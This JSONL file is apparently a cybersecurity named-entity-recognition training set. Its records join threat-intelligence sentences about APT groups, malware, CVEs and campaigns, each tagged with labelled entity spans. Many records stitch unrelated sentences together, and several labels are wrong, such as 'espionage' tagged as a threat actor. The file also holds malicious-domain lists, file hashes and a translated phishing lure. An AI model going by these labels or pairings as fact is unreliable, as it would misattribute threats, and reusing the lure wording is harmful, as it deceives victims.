APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns .", "spans": {"THREAT_ACTOR: APT34": [[107, 112]], "THREAT_ACTOR: Gorgon Group": [[295, 307]], "ORGANIZATION: Unit 42": [[310, 317]], "THREAT_ACTOR: Gorgon Group 's actors": [[387, 409]]}, "info": {"id": "cyberner_stix_train_005491", "source": "cyberner_stix_train"}} {"text": "As of this publication , dnc.org does not use the Google Apps Gmail email service .", "spans": {"DOMAIN: dnc.org": [[25, 32]], "ORGANIZATION: Google": [[50, 56]], "TOOL: email": [[68, 73]]}, "info": {"id": "cyberner_stix_train_005492", "source": "cyberner_stix_train"}} {"text": "This turned out to be a malicious loader internally named ' Slingshot ' , part of a new , and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": {"TOOL: Slingshot": [[60, 69]], "TOOL: Project Sauron": [[143, 157]], "TOOL: Regin": [[162, 167]], "ORGANIZATION: Pakistani businessmen": [[301, 322]]}, "info": {"id": "cyberner_stix_train_005493", "source": "cyberner_stix_train"}} {"text": "In our 9002 blog we noted some additional infrastructure used either as C2s for related Poison Ivy samples , or domain registrant overlap with those C2 domains . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . 
During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang .", "spans": {"MALWARE: 9002": [[7, 11]], "MALWARE: Poison Ivy": [[88, 98]], "ORGANIZATION: Serbian security": [[217, 233]], "THREAT_ACTOR: APT32": [[307, 312]], "MALWARE: customized PowerShell": [[373, 394]], "MALWARE: Cobalt Strike": [[450, 463]], "MALWARE: PowerSploit": [[466, 477]], "MALWARE: Nishang": [[482, 489]]}, "info": {"id": "cyberner_stix_train_005494", "source": "cyberner_stix_train"}} {"text": "That document appears to be empty , but the downloader , which is written in Delphi , continues running in the background .", "spans": {"TOOL: Delphi": [[77, 83]]}, "info": {"id": "cyberner_stix_train_005495", "source": "cyberner_stix_train"}} {"text": "Recently , I ’ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear .", "spans": {"TOOL: PowerShell": [[54, 64]]}, "info": {"id": "cyberner_stix_train_005496", "source": "cyberner_stix_train"}} {"text": "On attribution Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . This is important because if any system tool tries to open the host process it will never display the ZxShell DLL . 
None on the CrowdStrike Falcon ® console and of the market - leading CrowdStrike Falcon ® platform in action .", "spans": {"MALWARE: ViperRAT": [[34, 42]], "ORGANIZATION: Hamas": [[93, 98]], "MALWARE: ZxShell": [[347, 354]], "TOOL: DLL": [[355, 358]], "TOOL: CrowdStrike Falcon": [[373, 391], [430, 448]]}, "info": {"id": "cyberner_stix_train_005497", "source": "cyberner_stix_train"}} {"text": "Travelers must be aware of the threats posed when traveling – especially to foreign countries – and take extra precautions to secure their systems and data .", "spans": {}, "info": {"id": "cyberner_stix_train_005498", "source": "cyberner_stix_train"}} {"text": "This particular operation has been active since approximately May 2016 up to the present time . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) . The chfeeds.vbe file acts as a downloader and was used to download a second powershell script ( registry.ps1 ) . They would then initiate communication with additional C2 infrastructure to execute obfuscated PowerShell scripts .", "spans": {"ORGANIZATION: Department of Homeland Security": [[179, 210]], "ORGANIZATION: DHS": [[213, 216]], "ORGANIZATION: FBI": [[261, 264]], "FILEPATH: chfeeds.vbe": [[273, 284]], "TOOL: powershell": [[345, 355]], "FILEPATH: registry.ps1": [[365, 377]]}, "info": {"id": "cyberner_stix_train_005499", "source": "cyberner_stix_train"}} {"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . 
In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: defense sector firms": [[31, 51]], "ORGANIZATION: political target": [[89, 105]], "ORGANIZATION: financial": [[127, 136]], "ORGANIZATION: commercial": [[155, 165]], "ORGANIZATION: pharmaceutical": [[177, 191]], "ORGANIZATION: energy sectors": [[196, 210]], "ORGANIZATION: FireEye": [[268, 275]], "MALWARE: DeputyDog": [[362, 371]]}, "info": {"id": "cyberner_stix_train_005500", "source": "cyberner_stix_train"}} {"text": "We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation .", "spans": {"THREAT_ACTOR: groups": [[15, 21]], "VULNERABILITY: CVE-2018-0798": [[35, 48]]}, "info": {"id": "cyberner_stix_train_005501", "source": "cyberner_stix_train"}} {"text": "This minimizes the risk of detection and infection of unwanted victims .", "spans": {}, "info": {"id": "cyberner_stix_train_005502", "source": "cyberner_stix_train"}} {"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . 
This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"MALWARE: malware": [[4, 11]], "FILEPATH: bait document": [[135, 148]], "TOOL: Word": [[198, 202]], "VULNERABILITY: CVE-2012-0158": [[232, 245]], "VULNERABILITY: exploit": [[246, 253]]}, "info": {"id": "cyberner_stix_train_005503", "source": "cyberner_stix_train"}} {"text": "Get system information .", "spans": {}, "info": {"id": "cyberner_stix_train_005504", "source": "cyberner_stix_train"}} {"text": "READ_SMS - allow the application to read text messages . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success .", "spans": {"MALWARE: ShooterAudio module": [[61, 80]], "TOOL: PulseAudio": [[86, 96]], "MALWARE: Emissary": [[154, 162]]}, "info": {"id": "cyberner_stix_train_005505", "source": "cyberner_stix_train"}} {"text": "As with many of their other campaigns , TA505 delivered Shifu through macro laden Microsoft Office document attachments .", "spans": {"THREAT_ACTOR: TA505": [[40, 45]], "MALWARE: Shifu": [[56, 61]], "TOOL: macro": [[70, 75]], "ORGANIZATION: Microsoft": [[82, 91]], "TOOL: Office": [[92, 98]]}, "info": {"id": "cyberner_stix_train_005506", "source": "cyberner_stix_train"}} {"text": "Geography of Rotexy attacks According to our data , 98 % of all Rotexy attacks target users in Russia . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . 
TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu .", "spans": {"MALWARE: Rotexy": [[13, 19], [64, 70]], "THREAT_ACTOR: Patchwork": [[113, 122]], "MALWARE: RTF files": [[149, 158]], "VULNERABILITY: CVE-2017-8570": [[170, 183]], "THREAT_ACTOR: TEMP.Periscope": [[186, 200]], "THREAT_ACTOR: TEMP.Jumper": [[290, 301]], "MALWARE: NanHaiShu": [[370, 379]]}, "info": {"id": "cyberner_stix_train_005507", "source": "cyberner_stix_train"}} {"text": "As we ’ ve seen in last year ’ s mobile threat landscape , we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity , employing tried-and-tested techniques to lure unwitting users . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques . During our research , we found various job advertisements associated with the company on freelance and remote-work websites . DarkTortilla has used % HiddenReg%", "spans": {"TOOL: Enfal Trojan": [[236, 248]], "MALWARE: DarkTortilla": [[445, 457]]}, "info": {"id": "cyberner_stix_train_005508", "source": "cyberner_stix_train"}} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . 
Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "THREAT_ACTOR: LEAD": [[250, 254]], "THREAT_ACTOR: BARIUM": [[257, 263]], "THREAT_ACTOR: Wicked Panda": [[266, 278]], "THREAT_ACTOR: GREF": [[281, 285]], "THREAT_ACTOR: PassCV": [[288, 294]], "THREAT_ACTOR: Axiom": [[297, 302]], "THREAT_ACTOR: Winnti": [[309, 315]]}, "info": {"id": "cyberner_stix_train_005509", "source": "cyberner_stix_train"}} {"text": "It remains available within the source code but no method of use takes place . On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times . Much like Darwin ’s theory of biological evolution , APT12 been forced to evolve and adapt in order to maintain its mission . 
An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": {"ORGANIZATION: fake ad agencies": [[191, 207]], "THREAT_ACTOR: APT12": [[348, 353]], "MALWARE: APT32 backdoor": [[424, 438]]}, "info": {"id": "cyberner_stix_train_005510", "source": "cyberner_stix_train"}} {"text": "SeaDuke is a simple backdoor that focuses on executing commands retrieved from its C&C server , such as uploading and downloading files , executing system commands and evaluating additional Python code .", "spans": {"MALWARE: SeaDuke": [[0, 7]], "TOOL: C&C": [[83, 86]], "TOOL: Python": [[190, 196]]}, "info": {"id": "cyberner_stix_train_005511", "source": "cyberner_stix_train"}} {"text": "* * * End translation * * * The phishing template then presents additional instructions for installing the fake security application ( Figure 5 ) : Figure 5 : Additional instructions telling the victim to give the app the requested permissions ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Step 2 : Allow installation Open your device 's settings , select Security or Applications ( depending on the device ) , and check Unknown sources . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . 
APT37 ScarCruft , Reaper , Group123 , TEMP.Reaper APT37 is a suspected North Korean cyber espionage group that has been active since at least 2012 .", "spans": {"THREAT_ACTOR: actors": [[496, 502]], "ORGANIZATION: manage": [[621, 627]], "ORGANIZATION: ccTLDs": [[628, 634]], "THREAT_ACTOR: APT37": [[637, 642], [687, 692]], "THREAT_ACTOR: ScarCruft": [[643, 652]], "THREAT_ACTOR: Reaper": [[655, 661]], "THREAT_ACTOR: Group123": [[664, 672]], "THREAT_ACTOR: TEMP.Reaper": [[675, 686]]}, "info": {"id": "cyberner_stix_train_005512", "source": "cyberner_stix_train"}} {"text": "FakeSpy behavior on physical device vs emulator ( anti-emulator ) . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "MALWARE: GRIFFON": [[76, 83]], "THREAT_ACTOR: Ke3chang": [[197, 205]], "THREAT_ACTOR: attackers": [[206, 215]], "MALWARE: MyWeb": [[231, 236]], "MALWARE: malware": [[237, 244]]}, "info": {"id": "cyberner_stix_train_005513", "source": "cyberner_stix_train"}} {"text": "Note that we later found versions that used the domain as a C2 directly instead of the IP address . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . 
ScarCruft tools : 07d2200f5c2d03845adb5b20841faa94 AV Remover .", "spans": {"ORGANIZATION: ASERT": [[100, 105]], "THREAT_ACTOR: LUCKY ELEPHANT": [[152, 166]], "ORGANIZATION: foreign government": [[225, 243]], "ORGANIZATION: telecommunications": [[246, 264]], "ORGANIZATION: military": [[271, 279]], "THREAT_ACTOR: ScarCruft": [[282, 291]], "FILEPATH: 07d2200f5c2d03845adb5b20841faa94": [[300, 332]], "TOOL: AV Remover": [[333, 343]]}, "info": {"id": "cyberner_stix_train_005514", "source": "cyberner_stix_train"}} {"text": "Figure 9 : Malware secretly adds malicious resources to the DEX file Now , after the alteration of the original application , Android ’ s package manager will think that this is an update for the application signed by the same certificate , but in reality , it will execute the malicious DEX file . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery . exe so that they do n’t have to rely on the target system having a ZIP utility . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": {"SYSTEM: Android": [[126, 133]], "FILEPATH: exe": [[425, 428]], "TOOL: ZIP utility": [[492, 503]], "ORGANIZATION: @AnFam17": [[519, 527]]}, "info": {"id": "cyberner_stix_train_005515", "source": "cyberner_stix_train"}} {"text": "Decompiled exploit function code fragment run_with_mmap function from the android-rooting-tools project As can be seen from the comparison , there are similar strings and also a unique comment in Italian , so it looks like the attackers created this exploit payload based on android-rooting-tools project source code . These conflicts have even resulted in Haftar leading an attack on the capital city in April . 
Turla is a Russian-based threat group that has infected victims in over 45 countries , spanning a range of industries including government , embassies , military , education , research and pharmaceutical companies since 2004 .", "spans": {"SYSTEM: android-rooting-tools": [[74, 95], [275, 296]], "THREAT_ACTOR: Haftar": [[357, 363]], "THREAT_ACTOR: Turla": [[413, 418]], "ORGANIZATION: government": [[541, 551]], "ORGANIZATION: embassies": [[554, 563]], "ORGANIZATION: military": [[566, 574]], "ORGANIZATION: pharmaceutical companies": [[602, 626]]}, "info": {"id": "cyberner_stix_train_005516", "source": "cyberner_stix_train"}} {"text": "In Figure 1 , which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017 , we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017 . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"ORGANIZATION: FireEye": [[32, 39]], "THREAT_ACTOR: APT37": [[236, 241]], "ORGANIZATION: research fellow": [[253, 268]], "ORGANIZATION: advisory member": [[271, 286]], "ORGANIZATION: journalist": [[293, 303]], "ORGANIZATION: strategic organizations": [[367, 390]]}, "info": {"id": "cyberner_stix_train_005517", "source": "cyberner_stix_train"}} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , industrial control systems and SCADA , government , and media for espionage and destructive purposes , since at least 2011 . 
Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": {"TOOL: Black Energy": [[117, 129]], "ORGANIZATION: energy": [[165, 171]], "ORGANIZATION: government": [[213, 223]], "ORGANIZATION: media": [[230, 235]], "THREAT_ACTOR: espionage": [[240, 249]], "THREAT_ACTOR: GoCrack": [[346, 353]], "ORGANIZATION: additional users": [[487, 503]]}, "info": {"id": "cyberner_stix_train_005518", "source": "cyberner_stix_train"}} {"text": "One of PLATINUM 's most recent and interesting tools is meant to inject code into processes using a variety of injection techniques . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 – 2013 .", "spans": {"THREAT_ACTOR: PLATINUM": [[7, 15]], "ORGANIZATION: Kaspersky Lab": [[147, 160]]}, "info": {"id": "cyberner_stix_train_005519", "source": "cyberner_stix_train"}} {"text": "Search web log files for evidence of web server scanning using the URIs listed in the Exploitation section and evidence of Exfiltration using the User-Agent in the Actions on objective section .", "spans": {"TOOL: User-Agent": [[146, 156]]}, "info": {"id": "cyberner_stix_train_005520", "source": "cyberner_stix_train"}} {"text": "When the Quasar serve retrieves the name of the uploaded file from the victim , it does not verify that it is a valid file path .", "spans": {"MALWARE: Quasar": [[9, 15]]}, "info": {"id": "cyberner_stix_train_005521", "source": "cyberner_stix_train"}} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . 
The document attached to this e-mail exploits CVE-2012-0158 .", "spans": {"VULNERABILITY: CVE-2017-10271": [[110, 124]], "TOOL: PowerShell": [[138, 148]], "VULNERABILITY: e-mail": [[288, 294]], "VULNERABILITY: exploits": [[295, 303]], "VULNERABILITY: CVE-2012-0158": [[304, 317]]}, "info": {"id": "cyberner_stix_train_005522", "source": "cyberner_stix_train"}} {"text": "However , over the last nine campaigns since Trend Micro‘s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security .", "spans": {"ORGANIZATION: Trend Micro‘s": [[45, 58]], "THREAT_ACTOR: TA505": [[73, 78]], "TOOL: .NET downloader": [[158, 173]], "TOOL: ServHelper": [[228, 238]], "MALWARE: .DLL variant": [[247, 259]], "FILEPATH: malware": [[292, 299]], "FILEPATH: mssecsvc2.0": [[338, 349]]}, "info": {"id": "cyberner_stix_train_005523", "source": "cyberner_stix_train"}} {"text": "] su/ChristinaMorrow hxxp : //homevideo2-12l [ . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did . Rancor : AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 . 
Ashley Madison ’s parent company — Toronto - based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": {"THREAT_ACTOR: Rancor": [[206, 212]], "FILEPATH: AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609": [[215, 279]], "ORGANIZATION: Ashley Madison ’s parent company": [[282, 314]], "ORGANIZATION: Avid Life Media": [[333, 348]], "ORGANIZATION: Dennis Bradshaw": [[440, 455]]}, "info": {"id": "cyberner_stix_train_005524", "source": "cyberner_stix_train"}} {"text": "THE INITIAL INSTALLATION PROCESS Once installed , EventBot prompts the user to give it access to accessibility services . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": {"MALWARE: EventBot": [[50, 58]], "MALWARE: RAT": [[126, 129]], "ORGANIZATION: energy": [[355, 361]], "ORGANIZATION: government": [[364, 374]], "ORGANIZATION: technology sectors": [[381, 399]]}, "info": {"id": "cyberner_stix_train_005525", "source": "cyberner_stix_train"}} {"text": "Doing a Google search for the Pastebin userid landed me on a YouTube video posted by an individual demonstrating his modified version of njRAT control panel/builder kit .", "spans": {"ORGANIZATION: Google": [[8, 14]], "TOOL: Pastebin": [[30, 38]], "ORGANIZATION: YouTube": [[61, 68]], "TOOL: njRAT control panel/builder kit": [[137, 168]]}, "info": {"id": "cyberner_stix_train_005526", "source": "cyberner_stix_train"}} {"text": "Figure 8 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . 
Phrases and sentences were borrowed from at least the following companies/sites : DKSec – www.dksec.com , OKIOK – www.okiok.com/services/tailored-solutions , MainNerve – www.mainnerve.com , Datics – www.datatics.com/cyber-security , Perspective Risk – www.perspectiverisk.com , Synack – https://www.synack.com/company , FireEye – https://www.fireeye.com/services/penetration-testing.html . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": {"ORGANIZATION: Cisco Talos": [[11, 22]], "ORGANIZATION: DKSec": [[282, 287]], "DOMAIN: www.dksec.com": [[290, 303]], "ORGANIZATION: OKIOK": [[306, 311]], "DOMAIN: www.okiok.com/services/tailored-solutions": [[314, 355]], "ORGANIZATION: MainNerve": [[358, 367]], "DOMAIN: www.mainnerve.com": [[370, 387]], "ORGANIZATION: Datics": [[390, 396]], "DOMAIN: www.datatics.com/cyber-security": [[399, 430]], "ORGANIZATION: Perspective Risk": [[433, 449]], "DOMAIN: www.perspectiverisk.com": [[452, 475]], "ORGANIZATION: Synack": [[478, 484]], "DOMAIN: https://www.synack.com/company": [[487, 517]], "ORGANIZATION: FireEye": [[520, 527]], "URL: https://www.fireeye.com/services/penetration-testing.html": [[530, 587]], "THREAT_ACTOR: Adversaries": [[590, 601]]}, "info": {"id": "cyberner_stix_train_005527", "source": "cyberner_stix_train"}} {"text": "Control of malware from a single center provides maximum flexibility . PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . This also suggests that these modules were built a few hours before the launcher itself , whose compilation timestamp is Thu Oct 24 14:10:32 2019 . Hello . 
3 am The time of mysticism , is nt it", "spans": {"TOOL: PsExec": [[71, 77]]}, "info": {"id": "cyberner_stix_train_005528", "source": "cyberner_stix_train"}} {"text": "Suckfly spent more time attacking the government networks compared to all but one of the commercial targets .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_005529", "source": "cyberner_stix_train"}} {"text": "amellet.bit danrnysvp.com ejtmjealr.com firop.com gefinsioje.com gesofgamd.com ponedobla.bit unoset.com .", "spans": {"DOMAIN: amellet.bit": [[0, 11]], "DOMAIN: danrnysvp.com": [[12, 25]], "DOMAIN: ejtmjealr.com": [[26, 39]], "DOMAIN: firop.com": [[40, 49]], "DOMAIN: gefinsioje.com": [[50, 64]], "DOMAIN: gesofgamd.com": [[65, 78]], "DOMAIN: ponedobla.bit": [[79, 92]], "DOMAIN: unoset.com": [[93, 103]]}, "info": {"id": "cyberner_stix_train_005530", "source": "cyberner_stix_train"}} {"text": "It includes information about the smartphone model , the OS version , the mobile operator , and the Trojan version . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . The Shellbot script is added to run after the victim ’s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab . 
CozyDuke droppers and spyware components often maintain fairly common characteristics , but the files ’ functionality is slightly modified depending on the actor ’s needs .", "spans": {"THREAT_ACTOR: TG-3390": [[133, 140]], "VULNERABILITY: CVE-2011-3544": [[155, 168]], "TOOL: HTTPBrowser backdoor": [[236, 256]], "VULNERABILITY: CVE-2010-0738": [[263, 276]], "TOOL: JBoss": [[298, 303]], "MALWARE: Shellbot": [[423, 431]], "MALWARE: CozyDuke": [[568, 576]]}, "info": {"id": "cyberner_stix_train_005531", "source": "cyberner_stix_train"}} {"text": "Attackers used the DynamicDNS to host the c2 server , this allows the attacker to quickly change the IP address in real time if the malware c2 server infrastructure is unavailable .", "spans": {"TOOL: DynamicDNS": [[19, 29]], "TOOL: c2": [[42, 44], [140, 142]]}, "info": {"id": "cyberner_stix_train_005532", "source": "cyberner_stix_train"}} {"text": "Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf : 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e .", "spans": {"FILEPATH: Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf": [[0, 54]], "FILEPATH: 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e": [[57, 121]]}, "info": {"id": "cyberner_stix_train_005533", "source": "cyberner_stix_train"}} {"text": "in .Net – skype_sync2.exe . This paper will cover the discovery of this campaign , dubbed ‘Operation Sheep’ , and an analysis of SWAnalytics . 
This group has aggressively targeted and compromised point of sale ( PoS ) systems in the hospitality and retail sectors .", "spans": {"SYSTEM: .Net": [[3, 7]], "THREAT_ACTOR: ‘Operation Sheep’": [[90, 107]]}, "info": {"id": "cyberner_stix_train_005534", "source": "cyberner_stix_train"}} {"text": "The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . In September 2017 , we discovered Silence attack on financial institutions .", "spans": {"ORGANIZATION: WikiLeaks'": [[40, 50]], "ORGANIZATION: Twitter": [[102, 109], [166, 173]], "ORGANIZATION: Pinterest": [[178, 187]], "ORGANIZATION: BuzzFeed": [[217, 225]], "ORGANIZATION: TechCrunch": [[230, 240]], "ORGANIZATION: financial institutions": [[315, 337]]}, "info": {"id": "cyberner_stix_train_005535", "source": "cyberner_stix_train"}} {"text": "For this particular packet , the reason is registration of the bot . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . APT34 uses a mix of public and non-public tools .", "spans": {"TOOL: Visma": [[135, 140]], "THREAT_ACTOR: APT10": [[197, 202]], "MALWARE: 1.bat": [[238, 243]], "MALWARE: cu.exe": [[246, 252]], "MALWARE: ss.rar": [[255, 261]], "MALWARE: r.exe": [[264, 269]], "MALWARE: pd.exe": [[272, 278]], "THREAT_ACTOR: APT34": [[281, 286]], "MALWARE: public and non-public tools": [[301, 328]]}, "info": {"id": "cyberner_stix_train_005536", "source": "cyberner_stix_train"}} {"text": "On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . 
The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": {"THREAT_ACTOR: APT group": [[48, 57]], "ORGANIZATION: financial": [[137, 146]], "ORGANIZATION: high-tech companies": [[151, 170]], "FILEPATH: malicious attachments": [[177, 198]], "MALWARE: invitations": [[215, 226]], "MALWARE: drafts of the agenda": [[230, 250]]}, "info": {"id": "cyberner_stix_train_005537", "source": "cyberner_stix_train"}} {"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: social media": [[30, 42]], "TOOL: RATs": [[189, 193]], "TOOL: PupyRAT": [[202, 209]]}, "info": {"id": "cyberner_stix_train_005538", "source": "cyberner_stix_train"}} {"text": "Targeting appears to be widely spread across the Middle East , Europe , and Asia .", "spans": {}, "info": {"id": "cyberner_stix_train_005539", "source": "cyberner_stix_train"}} {"text": "Why Did Chinese Spyware Linger in U.S . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading technique . 
The message asked the recipient to rename the attachment extension from “ ._X_ ” to “ .exe ” and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": {"THREAT_ACTOR: APT10": [[87, 92]], "TOOL: Trochilus": [[234, 243]], "FILEPATH: ._X_": [[384, 388]], "FILEPATH: .exe": [[396, 400]], "TOOL: email": [[453, 458]]}, "info": {"id": "cyberner_stix_train_005540", "source": "cyberner_stix_train"}} {"text": "The Korean malware Wroba , in addition to the traditional vector of infection via file-sharing services , spreads via alternative app stores . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor . DllMain performs the initialization of ZxShell . Get Ready for Ransomware in 2023 with the ThreatConnect Platform", "spans": {"MALWARE: Wroba": [[19, 24]], "TOOL: Metasploit": [[275, 285]], "MALWARE: ZxShell": [[372, 379]]}, "info": {"id": "cyberner_stix_train_005541", "source": "cyberner_stix_train"}} {"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] . 
During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "MALWARE: malicious Microsoft Word attachment": [[70, 105]], "TOOL: C2": [[208, 210]], "FILEPATH: XLS-withyourface.xls": [[282, 302]], "FILEPATH: XLS-withyourface – test.xls": [[307, 334]]}, "info": {"id": "cyberner_stix_train_005542", "source": "cyberner_stix_train"}} {"text": "We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor .", "spans": {"THREAT_ACTOR: Emissary Panda": [[11, 25]], "VULNERABILITY: vulnerability": [[55, 68]], "VULNERABILITY: CVE-2019-0604": [[104, 117]], "MALWARE: software updates": [[271, 287]], "MALWARE: ShadowPad backdoor": [[412, 430]]}, "info": {"id": "cyberner_stix_train_005543", "source": "cyberner_stix_train"}} {"text": "Symantec researchers have discovered that this attack group , which we call Whitefly , has been operating since at least 2017 , has targeted organizations based mostly in Singapore across a wide variety of sectors , and is primarily interested in stealing large amounts of sensitive information . 
